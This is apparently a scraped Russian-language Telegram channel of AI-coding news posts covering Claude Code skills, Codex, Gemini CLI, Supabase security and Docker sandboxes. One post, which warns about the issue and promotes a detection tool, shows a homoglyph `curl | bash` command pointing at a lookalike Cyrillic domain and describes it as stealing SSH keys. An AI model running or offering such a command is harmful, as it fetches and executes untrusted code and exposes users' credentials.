This media is not supported in your browser
VIEW IN TELEGRAM
Уикенд-проект по AI-кодингу: чувак собрал идеальное приложение для детекта попкорна 🍿
Оно в реальном времени слушает через микрофон хлопки попкорна в микроволновке и говорит, когда нужно остановиться, чтобы не сжечь.
Создано на связке Gemini + Claude.
Оно в реальном времени слушает через микрофон хлопки попкорна в микроволновке и говорит, когда нужно остановиться, чтобы не сжечь.
Создано на связке Gemini + Claude.
Please open Telegram to view this post
VIEW IN TELEGRAM
Кстати, сегодня день рождения у термина «вайб-кодинг» ❤️
Легендарный твит про “вайбкодинг” был впервые опубликован Андреем Карпаты ровно год назад. Именно в этом посте он впервые ввёл термин и описал "новый вид кодинга, где ты полностью отдаёшься вайбу"
Please open Telegram to view this post
VIEW IN TELEGRAM
17
This media is not supported in your browser
VIEW IN TELEGRAM
Обнова: выпустили официальный коннектор Claude для Supabase.
Раз уж тема на пике, можно спросить у него что-то вроде:
И это только начало.
Безопасность нельзя вайб-кодить. Ее нужно тестировать, ретестировать и тестировать снова. Плюс есть архитектурные шаги, которые ты можешь сделать, например добавить Private Link
И еще куча других инструментов, которые у тебя под рукой
И чтобы прояснить путаницу вокруг Row Level Security: Row Level Security (RLS) это просто инструмент (как TypeScript), а не фреймворк (как React, Vue.js). Ты можешь использовать RLS с любой моделью Auth, которая тебе нужна.
Вот доки по Role-Based Access Control (RBAC)
Также можно настроить middleware через Database Functions, типа "check_priveleges()", которые будут запускаться перед каждым запросом к базе
Вот еще один популярный пример RBAC
Или пример с использованием ACL
Думаю, Supabase могут сделать так, чтобы это было гораздо более очевидно и просто. Сейчас они работают над поддержкой AuthZ-фреймворков (смотрят в сторону Zanzibar, OpenFGA, CEL, Cedar и т.д.).
Безопасность это *Shared Responsibility*
Но помни, инфраструктурный провайдер не может решить проблемы с безопасностью за тебя.😭
Раз уж тема на пике, можно спросить у него что-то вроде:
"почини любые проблемы с безопасностью", и он тебе всё разрулит.И это только начало.
Безопасность нельзя вайб-кодить. Ее нужно тестировать, ретестировать и тестировать снова. Плюс есть архитектурные шаги, которые ты можешь сделать, например добавить Private Link
И еще куча других инструментов, которые у тебя под рукой
И чтобы прояснить путаницу вокруг Row Level Security: Row Level Security (RLS) это просто инструмент (как TypeScript), а не фреймворк (как React, Vue.js). Ты можешь использовать RLS с любой моделью Auth, которая тебе нужна.
Вот доки по Role-Based Access Control (RBAC)
Также можно настроить middleware через Database Functions, типа "check_priveleges()", которые будут запускаться перед каждым запросом к базе
Вот еще один популярный пример RBAC
Или пример с использованием ACL
Думаю, Supabase могут сделать так, чтобы это было гораздо более очевидно и просто. Сейчас они работают над поддержкой AuthZ-фреймворков (смотрят в сторону Zanzibar, OpenFGA, CEL, Cedar и т.д.).
Безопасность это *Shared Responsibility*
Но помни, инфраструктурный провайдер не может решить проблемы с безопасностью за тебя.
Please open Telegram to view this post
VIEW IN TELEGRAM
7
This media is not supported in your browser
VIEW IN TELEGRAM
Вышло обновление по Codex: представили отдельное приложение, которое теперь называют “флагманским” опытом Codex.
Что обещают:
▪️ можно вести несколько задач параллельно (в духе “несколько потоков работы”)
▪️ расширять Codex через skills
▪️ автоматизировать рутину и повторяющиеся действия
Забавный момент: командa говорит, что активно использовала приложение, чтобы… собирать само приложение
Самое интересное – приложение Codex временно доступно по подпискам ChatGPT Free и Go, а остальным тарифам удвоили лимиты
И это только первая из серии новинок, дальше обещают еще.
Что обещают:
Забавный момент: командa говорит, что активно использовала приложение, чтобы… собирать само приложение
Самое интересное – приложение Codex временно доступно по подпискам ChatGPT Free и Go, а остальным тарифам удвоили лимиты
И это только первая из серии новинок, дальше обещают еще.
Please open Telegram to view this post
VIEW IN TELEGRAM
9
This media is not supported in your browser
VIEW IN TELEGRAM
Gemini CLI прокачали расширения: теперь они поддерживают Agent Skills и Hooks
Это значит расширение для CLI теперь может быть не просто пакетиком команд, а нормальным набором кирпичиков под агента, в одном месте:
▪️ Agent Skills (скиллы агента)
▪️ Hooks (хуки на события/триггеры)
▪️ MCP servers
▪️ Context files (файлы контекста)
▪️ Custom commands (кастомные команды)
Говорят, уже есть 300+ расширений, можно ставить готовые или собрать свое.
Это значит расширение для CLI теперь может быть не просто пакетиком команд, а нормальным набором кирпичиков под агента, в одном месте:
Говорят, уже есть 300+ расширений, можно ставить готовые или собрать свое.
Please open Telegram to view this post
VIEW IN TELEGRAM
7
Новый роутер:
Самый простой способ маршрутизировать запросы во все бесплатные LLM, при этом модели подбираются по совместимости с твоим запросом
Попробовать можно тут
Еще учитываются твои настройки приватности при подборе бесплатных моделей, так что лучше их заранее проверить🤭
Заметка для пользователей OpenClaw:
После этого перезапусти gateway, и уже потом проси переключиться на нее.
openrouter/freeСамый простой способ маршрутизировать запросы во все бесплатные LLM, при этом модели подбираются по совместимости с твоим запросом
Попробовать можно тут
Еще учитываются твои настройки приватности при подборе бесплатных моделей, так что лучше их заранее проверить
Заметка для пользователей OpenClaw:
openrouter/free это новая модель, поэтому чтобы она появилась, можно выполнить:openclaw config unset agents.defaults.models
После этого перезапусти gateway, и уже потом проси переключиться на нее.
Please open Telegram to view this post
VIEW IN TELEGRAM
4
У Claude Code появился свой “продакт”
Вышел новый open-source инструмент, который автоматизирует весь пайплайн от документа до деплоя.
Он превращает сырые PRD в эпики, эпики в GitHub issues, а issues в продакшн-код. Автоматом.
И да, это на 100% open source.
Вышел новый open-source инструмент, который автоматизирует весь пайплайн от документа до деплоя.
Он превращает сырые PRD в эпики, эпики в GitHub issues, а issues в продакшн-код. Автоматом.
И да, это на 100% open source.
3
Для тех, кто спрашивает:
Теперь доступны Docker Sandboxes.
Они работают в изолированных microVM, так что агенты могут ставить пакеты, запускать Docker и править конфиги, не трогая хост-систему.
Подробнее → читать
“как гонять кодинг агентов и не угробить свой комп?”
Теперь доступны Docker Sandboxes.
Они работают в изолированных microVM, так что агенты могут ставить пакеты, запускать Docker и править конфиги, не трогая хост-систему.
Подробнее → читать
2
Зацените божественный проект NanoClaw.
Идея родилась так: автор посмотрел на раздутый кодбейз OpenClaw и просто поплыл: 52+ модулей, 8 конфигов, 45+ зависимостей. Трудноперевариваемая каша
В итоге он махнул рукой и сделал NanoClaw: код ужали и теперь понятно что за что отвечает
Запускается в контейнере Apple, агент крутится внутри, наружу особо не вылезает и ничего лишнего не творит. Вот это тру минимализм.
Исходники тут
Идея родилась так: автор посмотрел на раздутый кодбейз OpenClaw и просто поплыл: 52+ модулей, 8 конфигов, 45+ зависимостей. Трудноперевариваемая каша
В итоге он махнул рукой и сделал NanoClaw: код ужали и теперь понятно что за что отвечает
Запускается в контейнере Apple, агент крутится внутри, наружу особо не вылезает и ничего лишнего не творит. Вот это тру минимализм.
Исходники тут
GitHub
GitHub - gavrielc/nanoclaw: My personal Claude assistant that runs in Apple containers. Lightweight, secure, and built to be understood…
My personal Claude assistant that runs in Apple containers. Lightweight, secure, and built to be understood and customized for your own needs. - gavrielc/nanoclaw
3
Я протестировал много Claude Code скиллов, и последний из них: Planning with files.
Эта имба почти всегда (в 99% случаев) идеально закрывает все фичи, даже сложные.
Если ты ее не юзаешь, ты многое теряешь
Начать просто:
Дальше, когда пишешь любой промпт, просто добавь фразу: “Plan with files”.
Claude сам подхватит скилл и создаст 3 файла:
И в отличие от обычного plan mode, он будет возвращаться к этим файлам на протяжении всего планирования и выполнения, постоянно держа перед глазами что надо сделать и как.
Из-за этого “дрейф” почти пропадает, и план чётко выполняется по шагам.
Да, токенов съедает больше, но зато с первого раза и стабильно. Попробуй👏
Исходный код
Эта имба почти всегда (в 99% случаев) идеально закрывает все фичи, даже сложные.
Если ты ее не юзаешь, ты многое теряешь
Начать просто:
npx skills add https://github.com/othmanadi/planning-with-files --skill planning-with-files
Дальше, когда пишешь любой промпт, просто добавь фразу: “Plan with files”.
Claude сам подхватит скилл и создаст 3 файла:
task_plan.md, findings.md, progress.md.И в отличие от обычного plan mode, он будет возвращаться к этим файлам на протяжении всего планирования и выполнения, постоянно держа перед глазами что надо сделать и как.
Из-за этого “дрейф” почти пропадает, и план чётко выполняется по шагам.
Да, токенов съедает больше, но зато с первого раза и стабильно. Попробуй
Исходный код
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - OthmanAdi/planning-with-files: Claude Code skill implementing Manus-style persistent markdown planning — the workflow…
Claude Code skill implementing Manus-style persistent markdown planning — the workflow pattern behind the $2B acquisition. - OthmanAdi/planning-with-files
8
This media is not supported in your browser
VIEW IN TELEGRAM
Цитирование через промпт это надежда, что Claude процитирует точно. Фича citations это гарантирует.
Включается так:
Каждая цитата будет структурно гарантированно ссылаться на реальный текст, который вы сами предоставили.
Citations работают везде:
▪️ Ваши документы (PDF, текст) ->
▪️ Веб-поиск ->
▪️ Ваши кастомные результаты RAG ->
Один единый паттерн, чтобы любую заяву можно было быстро отследить до источника.
Доки
Включается так:
"citations": {"enabled": true} в ваших документах.Каждая цитата будет структурно гарантированно ссылаться на реальный текст, который вы сами предоставили.
Citations работают везде:
char_location, page_locationweb_search_result_location (всегда включено) search_result_locationОдин единый паттерн, чтобы любую заяву можно было быстро отследить до источника.
Доки
Please open Telegram to view this post
VIEW IN TELEGRAM
3
This media is not supported in your browser
VIEW IN TELEGRAM
Запустили RentAHuman.ai : сервис, где цифровые агенты могут нанимать реальных людей для выполнения задач в реальной жизни.
За первую ночь зарегистрировались уже 130+ человек, среди них модель с OnlyFans и CEO AI-стартапа.😆
Теперь, если вашему AI-агенту нужна помощь IRL, достаточно одного MCP-вызова, чтобы подключить настоящего человека.
Это объединяет автономных агентов и реальный мир
За первую ночь зарегистрировались уже 130+ человек, среди них модель с OnlyFans и CEO AI-стартапа.
Теперь, если вашему AI-агенту нужна помощь IRL, достаточно одного MCP-вызова, чтобы подключить настоящего человека.
Это объединяет автономных агентов и реальный мир
Please open Telegram to view this post
VIEW IN TELEGRAM
6
Релиз Qwen3-Coder-Next — открытая модель для кода, заточенная под агентов и локальную разработку.
Что нового:
Результаты на агентных бенчмарках: SWE-Bench Verified: Qwen3-Coder-Next >70% с фреймворком SWE-Agent
Несмотря на небольшой активный след, модель сравнима или превосходит несколько гораздо больших open-source моделей на разных агентных тестах.
Что нового:
▪️ 800 000 проверяемых задач + исполняемые окружения▪️ сильные результаты на SWE-Bench Pro с 80B параметров всего и 3B активных▪️ Поддержка: OpenClaw, Qwen Code, Claude Code, веб-разработка, браузер, Cline и другие▪️ Hugging Face: [ссылка]▪️ ModelScope: [ссылка]▪️ Блог: [ссылка]▪️ Технический отчет: [ссылка]
Результаты на агентных бенчмарках: SWE-Bench Verified: Qwen3-Coder-Next >70% с фреймворком SWE-Agent
Несмотря на небольшой активный след, модель сравнима или превосходит несколько гораздо больших open-source моделей на разных агентных тестах.
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
2
This media is not supported in your browser
VIEW IN TELEGRAM
Теперь к Claude можно подключаться прямо в Chrome через расширение VS Code.
Используй это для отладки фронтенд-приложений, сбора данных или автоматизации работы в браузере.
Установи расширение и введи
Установите расширение Claude в Chrome здесь, а VS Code здесь
Используй это для отладки фронтенд-приложений, сбора данных или автоматизации работы в браузере.
Установи расширение и введи
@browser, чтобы начать.Установите расширение Claude в Chrome здесь, а VS Code здесь
2
Будь честен. Когда ты в последний раз читал команду, прежде чем вставить её в терминал?
Потому что эти две строки выглядят одинаково:
Одна устанавливает тулзу.
Другая — уводит твои SSH-ключи.
Вот эта і — кириллическая, не латинская. Браузер такое заблокирует. Терминал даже не моргнёт.
Новички копипастят команды из ChatGPT и случайных репозиториев, вообще не задумываясь. Мы буквально в одном
Поэтому и сделали фикс — tirith
Невидимый shell-хук. Он перехватывает омографические атаки, ANSI-инъекции, скрытые команды и перезапись дотфайлов до выполнения.
30 правил. Полностью локально. Никакой телеметрии
Потому что эти две строки выглядят одинаково:
curl -sSL https://install.example-cli | bash
curl -sSL https://іnstall.example-clі | bash
Одна устанавливает тулзу.
Другая — уводит твои SSH-ключи.
Вот эта і — кириллическая, не латинская. Браузер такое заблокирует. Терминал даже не моргнёт.
Новички копипастят команды из ChatGPT и случайных репозиториев, вообще не задумываясь. Мы буквально в одном
curl | bash от того, чтобы потерять всё.Поэтому и сделали фикс — tirith
Невидимый shell-хук. Он перехватывает омографические атаки, ANSI-инъекции, скрытые команды и перезапись дотфайлов до выполнения.
30 правил. Полностью локально. Никакой телеметрии
5
This media is not supported in your browser
VIEW IN TELEGRAM
Теперь можно использовать Claude и Codex в GitHub и VScode с подпиской GitHub Copilot Pro+ или Copilot Enterprise.
▪️ Единое рабочее пространство с сессиями агентов для локальных, фоновых и облачных агентов
▪️ Параллельные сабагенты
▪️ Встроенный браузер
И многое другое…
И многое другое…
Please open Telegram to view this post
VIEW IN TELEGRAM
2
Советы для работы с Claude Code
(Добавьте их в ваш CLAUDE
1. Прежде чем писать код, опиши свой подход и дождись подтверждения. Всегда задавай уточняющие вопросы, если требования неясны.
2. Если задача затрагивает больше 3 файлов, остановись и разбей её на более мелкие подзадачи.
3. После написания кода, перечисли, что может сломаться, и предложи тесты для проверки.
4. При баге сначала напиши тест, который его воспроизводит, затем исправляй код, пока тест не проходит.
5. Каждый раз, когда я исправляю тебя, добавляй новое правило в CLAUDE
На англ.:
В файле правила обычно формулируются детальнее, чем здесь, но суть этих пунктов именно такая.
(Добавьте их в ваш CLAUDE
.md файл)1. Прежде чем писать код, опиши свой подход и дождись подтверждения. Всегда задавай уточняющие вопросы, если требования неясны.
2. Если задача затрагивает больше 3 файлов, остановись и разбей её на более мелкие подзадачи.
3. После написания кода, перечисли, что может сломаться, и предложи тесты для проверки.
4. При баге сначала напиши тест, который его воспроизводит, затем исправляй код, пока тест не проходит.
5. Каждый раз, когда я исправляю тебя, добавляй новое правило в CLAUDE
.md файл, чтобы это больше не повторялось.На англ.:
1. "Before writing any code, describe your approach and wait for approval. Always ask clarifying questions before writing any code if requirements are ambiguous."
2. "If a task requires changes to more than 3 files, stop and break it into smaller tasks first."
3. "After writing code, list what could break and suggest tests to cover it."
4. "When there’s a bug, start by writing a test that reproduces it, then fix it until the test passes."
5. "Every time I correct you, add a new rule to the CLAUDE .md file so it never happens again."
В файле правила обычно формулируются детальнее, чем здесь, но суть этих пунктов именно такая.
5
Опенсорс скилл: code-review-expert
Агент-скилл, который делает ревью кода как сеньор-инженер:
• нарушения принципов SOLID
• уязвимости безопасности (XSS, инъекции, race condition)
• проблемы с производительностью (N+1, отсутствие кэша)
• обработка ошибок и граничные случаи
Установка командой:
repo: https://github.com/sanyuan0704/code-review-expert
Агент-скилл, который делает ревью кода как сеньор-инженер:
• нарушения принципов SOLID
• уязвимости безопасности (XSS, инъекции, race condition)
• проблемы с производительностью (N+1, отсутствие кэша)
• обработка ошибок и граничные случаи
Установка командой:
npx skills add sanyuan0704/code-review-expert
repo: https://github.com/sanyuan0704/code-review-expert
GitHub
GitHub - sanyuan0704/code-review-expert: Expert code review skill: SOLID, security, performance, error handling, boundary conditions
Expert code review skill: SOLID, security, performance, error handling, boundary conditions - sanyuan0704/code-review-expert